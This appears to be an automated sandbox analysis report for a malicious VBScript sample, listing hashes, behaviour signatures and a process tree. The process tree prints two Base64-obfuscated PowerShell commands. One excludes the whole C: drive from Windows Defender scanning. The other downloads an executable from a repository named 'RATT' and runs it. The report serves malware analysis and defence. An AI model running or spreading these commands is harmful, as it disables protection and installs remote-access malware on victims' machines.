Analysis
-
max time kernel
120s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
04-06-2024 09:25
General
-
Target
d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs
-
Size
289KB
-
MD5
ac7f96ac94ca748354e7db225aa1a5b2
-
SHA1
98be163399271b71337afbc716b6a313ea1941e6
-
SHA256
d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e
-
SHA512
862f9d5bc0d4ba27cfa7d75b4974e4eb37d30f53de883419c3e1e7c62fb525a2964e8431b5b5c91e1d2654db5446bba60320d196b148b35480eec2ed2cc26692
-
SSDEEP
6144:Xm/uolvrxUXllOuQcTN5eZ2cH5d/ozSxCP27kbn8buCW+ZFU/Chpav1GUTs8quIr:W2svrwmuQ2yp5keCPtb8b1HZSCSDs8q/
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs" /elevate2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TNuiO = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=')); Invoke-Expression -Command $TNuiO3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $unLyJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBkAGUAdgBjAHIAaQBpAGkALwBSAEEAVABUAC8AcgBhAHcALwBtAGEAaQBuAC8AYgB1AGkAbAB0AC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGUAbgB2ADoAVABFAE0AUABcAHgAbABlAFUAaABaAEQATABRAEcAUABNAHMAaABlAGQAUABhAHQAWABxAFoALgBlAHgAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAVABFAE0AUABcAHgAbABlAFUAaABaAEQATABRAEcAUABNAHMAaABlAGQAUABhAHQAWABxAFoALgBlAHgAZQA=')); Invoke-Expression -Command $unLyJ3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD538bc9363ce302136820e28e9e32e0df1
SHA116d3ad1c224008c87a600d3601021c1fe13c713d
SHA256581de5350775bceb01d6c5039b9a4b096c729341d3147912688dd73eb7db65dd
SHA512551235294ec3b0a611c2fdc9abdd798f477eeaa99eda58647dc29c3416f93367bbb46ff55a5b34dcc738f7601a0e1fc6f7a833c8e9132e718d6ce11e0b03ae93
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
2.9MB
-
Filesize
32KB